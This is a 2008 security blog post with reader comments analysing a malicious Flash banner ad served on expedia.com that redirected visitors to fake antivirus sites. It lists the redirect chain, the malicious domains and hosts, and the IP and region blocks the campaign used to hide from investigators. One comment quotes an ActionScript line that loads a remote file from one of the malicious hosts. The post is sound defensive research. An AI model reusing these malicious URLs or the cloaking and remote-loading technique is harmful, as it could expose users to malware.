expedia.com hit by malicious banner advertisement?

Expedia.com has been infiltrated by a malicious banner advertisement - a new one that I have not seen before.

Victim site Expedia.com (216.251.114.10)
SWF host media.expedia.com
SWF Source  
Target fraudware domain scanner2.malware-scan.com
Banned cities, countries and IPs 199.3.0.0-199.3.255.255
216.251.0.0-216.251.255.255
172.30.0.0-172.30.25.255 (note: expedia.com's IP is banned)

IN, IL, UK, AU, FR, IT, CN, JP, DE, ES, MX, AE

colorado, washington, california, massachusetts, ontario, texas, hawaii, missouri, illinois
Permitted cities, countries and IPS  
SWF URL media.expedia.com/ads/FXSound/728x90.swf
Special notes  
Incident reported to expedia.com
Resolution  
 

Let's have a look at the danger path:

URL Referrer
scanner2.malware-scan.com/18_swp/?tmn=null&aid=&lid=&affid=&ax=&ed=&aid=pygmalioni_
ma18_mb1t&lid=728&affid=&ax=1&ed=2&mt_info=
3958_0_1349prevedmarketing.com/?tmn=mwatmp&aid=mi1eroof&lid=728&ax=1&ed=2
&mt_info=4957_3064_2358
prevedmarketing.com//?tmn=mwatmp&aid=pygmalioni&lid=728&ax=1&ed
=2&mt_info=5337_4168_2358
blessedads.com/?cmpid=pygmalioni&adid=728quinquecahue.com/statss.php?campaign=pygmalioni&u=1200655836
quinquecahue.com/swf/gnida.swf?campaign=pygmalioni&u=1200655836
quinquecahue.com/swf/gnida.swf?campaign=pygmalioni&u=1200655836 quinquecahue.com/statsg.php?u=1200655836&campaign=pygmalioni
quinquecahue.com/statsa.php?u=1200655836&campaign=pygmalioni media.expedia.com/ads/FXSound/728x90.swf

So, let's take a look at this new name, quinquecahue.com.

Not surprisingly, the malicious domain is hosted by, you guessed it, securehost.com (190.15.64.190):
http://www.robtex.com/dns/quinquecahue.com.html

Who else might we find in that IP range...
http://www.robtex.com/cnet/190.15.64.html

Again, no surprise, we see akamahi.net, newbieadguide.com, vozemiliogaranon.com and a name I have not seen before, familyislands.com.

Check out the domains sharing nameservers with quinquecahue.com - I *know* you're going to recognise many names....

domains sharing nameservers
 
advancedcleaner.com
akamahi.net
antispywaresuite.com
antiviruspcsuite.com
antiworm2008.com
avsystemcare.com
bestsellerantivirus.com
diskretter.com
elmejorantivirus.com
erreurchasseur.com
exterminadordevirus.com
moncontenuassistant.com
schijfbewaker.com
securepccleaner.com
spyguardpro.com
storageprotector.com
systemdoctor.com
thetechnorati.com
toolsicuro.com
vozemiliogaranon.com
winspycontrol.com
yourprivacyguard.com

 subdomains
*.quinquecahue.com
ns1.quinquecahue.com
ns2.quinquecahue.com
ns3.quinquecahue.com
ns4.quinquecahue.com
 

Published Mon, Jan 28 2008 21:24 by sandi

Comments

# re: expedia.com hit by malicious banner advertisement?

Wednesday, January 30, 2008 10:49 PM by RBNexploit

This is another run as in November 07, there are few more hosts involved in the triangulation see rbnexploit.blogspot.com/.../rbn-pc-hijacking-via-banner-ads-on.html

# re: expedia.com hit by malicious banner advertisement?

Thursday, January 31, 2008 2:13 AM by David Marsden

I got something similar from http://www.genesreunited.co.uk which attemtped to download PerformanceOptimizer.

# re: expedia.com hit by malicious banner advertisement?

Friday, February 01, 2008 9:45 AM by mike wood

re malicious banner advertisement. I too got hit from GenesReunited.co.uk with PerformanceOptimizer. as a naive computer, do i need to let GR know about it. and how come their security didnt pick it up??

# re: expedia.com hit by malicious banner advertisement?

Saturday, February 02, 2008 1:47 PM by David Marsden

Hi Mike,

I reported this to GR and they tried to fob me off by advising me that my account seemed to be ok and that I should run an anti-virus program. I replied that I didn't even download the spyware and that I use linux as an operating system, but that plenty of their other users may be at risk and should be aware. I also gave them a link to this site.

GR appears to be down right now...

# re: expedia.com hit by malicious banner advertisement?

Saturday, February 02, 2008 8:52 PM by sandi

Hi guys,

The campaign on genesreunited has been coded to NOT display when the computer being used is in genesreunited's IP range.

I need a Fiddler capture, Ethereal capture or other network trace - that will give me all the proof I need to get this shut down.

Sandi

# re: expedia.com hit by malicious banner advertisement?

Monday, February 04, 2008 9:28 AM by Golan

Hi,

Sorry for the off topic question, but how can you tell which are the banned IP's/Cities/Countries ?

Thanks!

# re: expedia.com hit by malicious banner advertisement?

Friday, March 28, 2008 9:51 PM by bago

It was a pretty clever attack, where from a neutral country they would contact the ad provider and provide them with highly obfuscated flash. The Flash would then check the campaigns blacklist so that if you were trying to figure out where these rogue ads came from you got a blank flash file. Then it would download gnida.swf, which would then download the slowware that they advertised how to remove. The main problem is that adobe lets you make a function call with an array reference, bypassing CAS.

_root[_url][substr](0, 7) == http:// && this.m1[loadMovie](newbieadguide.com/statsa.php + &u=somenumbers);

Each campaign had its own blacklist and region lockout.

Here was the IP blacklist:

62.193.227.221

62.193.235.245

62.193.235.46

64.233.183.104

66.102.9.104

66.249.91.104

69.46.17.170

72.14.209.104

72.14.235.104

72.14.253.104

209.85.135.104

062.193.227.222

066.232.118.93